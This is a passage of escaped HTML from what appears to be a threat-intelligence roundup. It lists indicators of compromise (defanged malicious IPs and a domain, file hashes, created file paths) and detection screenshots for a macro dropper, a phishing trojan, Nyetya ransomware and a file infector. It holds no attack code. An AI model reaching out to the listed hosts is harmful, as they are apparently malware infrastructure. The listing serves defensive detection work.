src="https://4.bp.blogspot.com/-ogMbT-9uy3M/WV-nC3PYqpI/AAAAAAAAASs/cJniRJPrkEolwlhu9iZa6Y6hsEc3So9LACLcBGAs/s640/Doc_Dropper_Agent_6332127_0_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-YnXzFa3wcvs/WV-nc80b-qI/AAAAAAAAASw/17I-Ykht2PgzQDjjrIqeB1YUafWpt0LbQCLcBGAs/s1600/Doc_Dropper_Agent_6332127_0_umbrella1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="710" data-original-width="1241" height="366" src="https://3.bp.blogspot.com/-YnXzFa3wcvs/WV-nc80b-qI/AAAAAAAAASw/17I-Ykht2PgzQDjjrIqeB1YUafWpt0LbQCLcBGAs/s640/Doc_Dropper_Agent_6332127_0_umbrella1.png" width="640" /&gt;&lt;/a&gt; &lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Macro.Obfuscation-6331107-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;185[.]165[.]29[.]36&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Users\Administrator\Documents\20170705\PowerShell_transcript.PC.0WdK03OL.20170705095145.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;7ffb78b5dee7b2d48155236daaea99b9887ff61ec107d48a2522c951795f3353&lt;/li&gt;&lt;li&gt;af89ebcecc2478cb5f90696aa75aaa3dca27c4928265b4b6833e95b5672d7a0a&lt;/li&gt;&lt;li&gt;1a3bd5acc39ff619417fc217786f8b6338348a1f5eda994cbd03a5d014d351b8&lt;/li&gt;&lt;li&gt;8db59629e0b972ca9aa4da3dd56278340dc1f4ad7849e536bd2a1dc2c8ec59ff&lt;/li&gt;&lt;li&gt;1e56463b3aebc9fdf435ca3910a7db4e5a1c9f7b6568da5ced62b2451345eb68&lt;/li&gt;&lt;li&gt;0696df98c9074fc4c05454149e9a9ce7f3bfec9d19852691a49919027aa2be05&lt;/li&gt;&lt;li&gt;01d024ae353d2c4349fb13bfff1417e77ee2f85c75834f91762f80ca1d25a0c9&lt;/li&gt;&lt;li&gt;f38d35b8be18d3efe2394929184ad41e9e7c1f699bbc5cdebc4783b159075c66&lt;/li&gt;&lt;li&gt;c5ceecdc491077b8db797d1c65eed03efed8ea28cd0ee5d0926e3fa591920426&lt;/li&gt;&lt;li&gt;441e093374df7b806bf883d564810c8733b5f664add7baa4a8b7df6c49b04dcf&lt;/li&gt;&lt;li&gt;403589bd4b2c275564aac4382800eaf5836ff61817ddb76afb9b7c7f24b0c0e9&lt;/li&gt;&lt;li&gt;ef4685089d285ce677bc2aa2f2490dd25120d2af19fb6d2570adb03f0a5a3e7a&lt;/li&gt;&lt;li&gt;1d7bd5817b240a053cac0c6b3af1d848ed4b03e6bd334bd2e040800215d8d601&lt;/li&gt;&lt;li&gt;dc4c028949fdd43c7d67fe085e4c85a62633a38e49a510e71d41270008fd29fa&lt;/li&gt;&lt;li&gt;c07cdfd59b7ea1bdd2a6e267df60300bf23b1888f0582ef050946d0cba571f08&lt;/li&gt;&lt;li&gt;6cea69fa05cbf2a0db2ca40684ccbf3e4ea4744f5f6ae27655871d35cc6c85bd&lt;/li&gt;&lt;li&gt;ec988f1b09c617c1b609e25aea76e7afa871bb2188accd75f3dd24d0834c5c47&lt;/li&gt;&lt;li&gt;29013332f09195261f8be7fd43674e4e5132a28744ed52a45d787646a6e8659f&lt;/li&gt;&lt;li&gt;c30d4d4b41d7f690762ef26ffdbf14c7eff7ce92e7b8cfa87f5182bb057f05a2&lt;/li&gt;&lt;li&gt;ee97cf5279ca40e5e3d879f4a8e0fdec6b3a5fb7547ece74252c72419df0a6fd&lt;/li&gt;&lt;li&gt;877107ecf0a698fad3a210289777dc647650c493f11cb384044a879efb3f16fb&lt;/li&gt;&lt;li&gt;123abdbf3c470dde32d7cbfa97e0393eaf602a3befa8050dfe8738a1c4b14768&lt;/li&gt;&lt;li&gt;124e908d1670ede9541b4f0ed6376dd03c62d1cf7b0ff22943a7fa3be90ce238&lt;/li&gt;&lt;li&gt;ff7706bdd749accba1ea5c49903fb200af7fb3edf3e95d5f9686e78ec699847e&lt;/li&gt;&lt;li&gt;470918fd1ed47e4454af807c3b14b55314cb07a86d053ff83f3233628f08bd8e&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VXpTlovFgbo/WV-ogemcXCI/AAAAAAAAATI/E62IUJ1lx4oUty4dJ2GC0LUjRQtmfWL-ACLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="217" src="https://4.bp.blogspot.com/-VXpTlovFgbo/WV-ogemcXCI/AAAAAAAAATI/E62IUJ1lx4oUty4dJ2GC0LUjRQtmfWL-ACLcBGAs/s320/Doc_Macro_Obfuscation_6331107_0_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-FsFXdRU-feM/WV-okUcgMYI/AAAAAAAAATM/ZCD-oDbVNYUmi7Jbm0B8QvVWDl2aJgmxwCLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1017" data-original-width="1237" height="526" src="https://1.bp.blogspot.com/-FsFXdRU-feM/WV-okUcgMYI/AAAAAAAAATM/ZCD-oDbVNYUmi7Jbm0B8QvVWDl2aJgmxwCLcBGAs/s640/Doc_Macro_Obfuscation_6331107_0_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-Apn_rNCext4/WV-pwCM33VI/AAAAAAAAATY/PQiWcvQ_rIQfSENjLkagn7xgX0ONn_cmQCLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="350" src="https://1.bp.blogspot.com/-Apn_rNCext4/WV-pwCM33VI/AAAAAAAAATY/PQiWcvQ_rIQfSENjLkagn7xgX0ONn_cmQCLcBGAs/s640/Doc_Macro_Obfuscation_6331107_0_umbrella.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-EuH98wynXXo/WV-p7exLzRI/AAAAAAAAATc/b5K8VApEBS8XoGuNRzFEmt-72j-loNB6wCLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="406" data-original-width="716" height="362" src="https://4.bp.blogspot.com/-EuH98wynXXo/WV-p7exLzRI/AAAAAAAAATc/b5K8VApEBS8XoGuNRzFEmt-72j-loNB6wCLcBGAs/s640/Doc_Macro_Obfuscation_6331107_0_malware.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Phishing.NikoLata-6332081-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;176[.]31[.]115[.]114&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;bigpicturepop[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;0033e8aa040b150f10aae632940f5e975fdd8c9f3c50e3390655c4098a41a4a0&lt;/li&gt;&lt;li&gt;0899df6fe90b23914cf7bfaabf5b52eb61565f529006e1f8ae5c1c3603eb9120&lt;/li&gt;&lt;li&gt;0a222dac8daabd8f2ba8825519ad65916f88ad194caf3a0bde754cf49bc41699&lt;/li&gt;&lt;li&gt;102113176eeb0d8b170adda4fe1fc531d54bc8b8faa8aa0cbc8968acc478d2ee&lt;/li&gt;&lt;li&gt;237fdfef4a1dc47ebf3119ba0f16ea6f780acab50d964816f1d00c7340246366&lt;/li&gt;&lt;li&gt;338dcfc2a8933338210abb98144ec4d50907130b24c59b00307d1e37e89eeaab&lt;/li&gt;&lt;li&gt;34d135535a27eb46f4eefb5c62cf98f86a246cb1b8328206e300667e149d5e20&lt;/li&gt;&lt;li&gt;3727278e0326aa8726e8320d75b2224b601d575e49147befec4089fde72c8b6c&lt;/li&gt;&lt;li&gt;378be621adbd9655c1e8f439134b99da4eecddf41b09f3484496663cc2ea393f&lt;/li&gt;&lt;li&gt;3cb106ce8f4015abe7b2789f2675b5b4dc266b8c976bb79b4a9e50599ab822ba&lt;/li&gt;&lt;li&gt;466f3aaa5c69515cfeb0900d4c0487aa2c1e12fcc8d8bf2ed730ca56a22943ca&lt;/li&gt;&lt;li&gt;49e513841ef91b0b3cb3d58fe1d7e2c75373800c7c5062653905126bd1c586e3&lt;/li&gt;&lt;li&gt;61d79e963c2f1762920d1c8729d0e604cae6050cfc36bddc309fb9ffbecc0182&lt;/li&gt;&lt;li&gt;713353bc597075e577b738f843e9372444f8ed0010efc11ff80303dc9656f96b&lt;/li&gt;&lt;li&gt;7bb0b281ee6cd0d0859c51c4866528c1de8d36a337ef8449bde7422da6e7b908&lt;/li&gt;&lt;li&gt;857699fe734788e94f2fa7bf025211426c44aa065143ab98b55ab2864424fb8d&lt;/li&gt;&lt;li&gt;8fa890ae7063262b8092da0fff281cb11b633dd83e1f228351d187a07e51c248&lt;/li&gt;&lt;li&gt;90d993829351a41644966a191100eb7971c7fc886dfdcb2c023e6c7fb43900f9&lt;/li&gt;&lt;li&gt;9a60e3fc1c6e903f089b56c852b050f04dcbab6adf0bd44215e310b0b2663de6&lt;/li&gt;&lt;li&gt;a41812691e197802b49cf1c6b1fcbf7d4f933a87032f3edd22e9e003749c5f21&lt;/li&gt;&lt;li&gt;a7c803f8e2d17980b71ee3e895953e699da2cf316a70b1f76d5279f0af433235&lt;/li&gt;&lt;li&gt;b1a0201a3d9529d966509111e6704f4bda521e26fc8142345e3f61712a64df55&lt;/li&gt;&lt;li&gt;baf999647eb654bda2447ab3f017e634813fa3b01a656bda998178d17cfd0c1c&lt;/li&gt;&lt;li&gt;bdb1b6aef20ec375f6f85c4f19a0d04228287e59dccbc72aaa79df1b9cbf9fc8&lt;/li&gt;&lt;li&gt;c16b026d16e9ef8574dbb1e0f92b802ffb19ccb41cfe957246ffeba98b82f3df&lt;/li&gt;&lt;li&gt;cb3f34148beb2763a71b1727916490ac9e8825a68f60c296ebd98c4ec7bbfb6c&lt;/li&gt;&lt;li&gt;cb891c0462de4eb8aa98c0af2ca4c70ea3e8ceb5f804af9c4b3a01abcfef82c9&lt;/li&gt;&lt;li&gt;cdb21c6a6a47a508b5bf05f1f4e49b1a550cacec2452657fb9f094b2f0de9890&lt;/li&gt;&lt;li&gt;ce397649edb82756667a63c26de24373992b84bbc4cf80353f5117876acebb2d&lt;/li&gt;&lt;li&gt;eb024d54b61073e674d06c53fdc1523156d75268eaf9aff20070364df4ab0760&lt;/li&gt;&lt;li&gt;ef509c6ac1fae60d57f773e4087b0412d3f08edbb19dc93218b183724bd64d83&lt;/li&gt;&lt;li&gt;f1adbdee86076c202ab5d5783c9e8d5873b76a88a86a81ad10c275884303eaff&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-gOZ5OES86_c/WPEu6PXqqyI/AAAAAAAAA2k/rhzBmZWBIY8_NOPnIThu8JGsXhdT5NuhACLcB/s400/amp-tg-umbrellla-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-gOZ5OES86_c/WPEu6PXqqyI/AAAAAAAAA2k/rhzBmZWBIY8_NOPnIThu8JGsXhdT5NuhACLcB/s400/amp-tg-umbrellla-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-Jr43VR4dOD4/WV-qemUsPHI/AAAAAAAAATg/gE6vbWVqY8M-fMDLv8TmsLJmjNqSQDLagCLcBGAs/s1600/NikoLata_amp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://4.bp.blogspot.com/-Jr43VR4dOD4/WV-qemUsPHI/AAAAAAAAATg/gE6vbWVqY8M-fMDLv8TmsLJmjNqSQDLagCLcBGAs/s320/NikoLata_amp.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-YKpEKR06vIo/WV-qn3T4EFI/AAAAAAAAATk/s8hE6jT1Zx0n96-GQtlxObVg6vUacL4PwCLcBGAs/s1600/NikoLata_tg.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="1237" height="416" src="https://4.bp.blogspot.com/-YKpEKR06vIo/WV-qn3T4EFI/AAAAAAAAATk/s8hE6jT1Zx0n96-GQtlxObVg6vUacL4PwCLcBGAs/s640/NikoLata_tg.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-9EJoof8JSCM/WV-qtAtv4SI/AAAAAAAAATo/VvPWw9rGmmUOEu7rhxlaBrH2Fz7P__pWwCLcBGAs/s1600/NikoLata_umbrella.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="350" src="https://2.bp.blogspot.com/-9EJoof8JSCM/WV-qtAtv4SI/AAAAAAAAATo/VvPWw9rGmmUOEu7rhxlaBrH2Fz7P__pWwCLcBGAs/s640/NikoLata_umbrella.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-q-QYDQgpKNE/WV-qymNDcSI/AAAAAAAAATs/XO5ne6SqIW8jxbnbkeKZm1KtBIxWx_ekwCLcBGAs/s1600/NikoLata_263517589_SCR_8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-q-QYDQgpKNE/WV-qymNDcSI/AAAAAAAAATs/XO5ne6SqIW8jxbnbkeKZm1KtBIxWx_ekwCLcBGAs/s640/NikoLata_263517589_SCR_8.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.Nyetya-6331387-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\WINDOWS\perfc.dat&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745&lt;/li&gt;&lt;li&gt;eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998&lt;/li&gt;&lt;li&gt;02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-xTAafbchxZY/WV-rHjCii_I/AAAAAAAAATw/wr7QkcV6nig42-bmsDTz-Yg5UNjZkluHQCLcBGAs/s1600/Win_Ransomware_Nyetya_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-xTAafbchxZY/WV-rHjCii_I/AAAAAAAAATw/wr7QkcV6nig42-bmsDTz-Yg5UNjZkluHQCLcBGAs/s320/Win_Ransomware_Nyetya_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-uu00ujtysLw/WV-rMHdzFxI/AAAAAAAAAT0/NiHxeMCI808qwjN2R29YspyQzRTNpXHnwCLcBGAs/s1600/Win_Ransomware_Nyetya_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="628" data-original-width="1600" height="250" src="https://4.bp.blogspot.com/-uu00ujtysLw/WV-rMHdzFxI/AAAAAAAAAT0/NiHxeMCI808qwjN2R29YspyQzRTNpXHnwCLcBGAs/s640/Win_Ransomware_Nyetya_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-P8Q4my8dXys/WV-rR0ISxAI/AAAAAAAAAT4/LTPPKr1d1DE4gO905iG2Cm7Z28JHtVJ3wCLcBGAs/s1600/Win_Ransomware_Nyetya_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1440" height="354" src="https://4.bp.blogspot.com/-P8Q4my8dXys/WV-rR0ISxAI/AAAAAAAAAT4/LTPPKr1d1DE4gO905iG2Cm7Z28JHtVJ3wCLcBGAs/s640/Win_Ransomware_Nyetya_malware.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Fileinfector-67&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\mxdwdrv.dll&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\Security\directories.acrodata&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\AdobeSysFnt08.lst&lt;/li&gt;&lt;li&gt;%CommonProgramFiles%\Microsoft Shared\Filters\VISFILT.DLL&lt;/li&gt;&lt;li&gt;%SystemDrive%\AUTOEXEC.BAT&lt;/li&gt;&lt;li&gt;%System32%\wdi\LogFiles\WdiContextLog.etl.001&lt;/li&gt;&lt;li&gt;%SystemDrive%\CONFIG.SYS&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\JSCache\GlobData&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\amd64\msxpsinc.gpd&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\filterpipelineprintproc.dll&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\JSCache\GlobSettings&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\Security\addressbook.acrodata&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\xpssvcs.dll&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\7.0\Updater\udstore.js&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\7.0\UserCache.bin&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\ReaderMessages&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\TMDocs.sav&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\assets\assets-140109170701Z-78340&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\7.0\Collab\RSS&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\msxpsdrv.inf&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\TMGrpPrm.sav&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\Preferences\AutoFillDefaults.dat&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\Synchronizer\adobesynchronizersu80&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\AdobeCMapFnt08.lst&lt;/li&gt;&lt;li&gt;%CommonProgramFiles%\Microsoft Shared\Filters\msgfilt.dll&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;414d5a6eb59a5597774e3e69ead25ac64e5c5805d899886fc4c53ed0e4b1960d&lt;/li&gt;&lt;li&gt;f9f0449bd2187f8a69a2e8a2eebae77c45d422900a762664847f4b097796bec5&lt;/li&gt;&lt;li&gt;aab0014dbda65fb1ae5340a8b6da731aaa3215bb340c7df80b5b033ad2533001&lt;/li&gt;&lt;li&gt;29ba1dae0c75b5d67de2fb832a65a0a8d226f9585f1a3e334926259065355618&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-TcREmaXCxOQ/WV-rjACVPvI/AAAAAAAAAT8/t9wltmq9husP4BiYORehazAZCua39otSgCLcBGAs/s1600/Win_Trojan_Fileinfector_67_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" 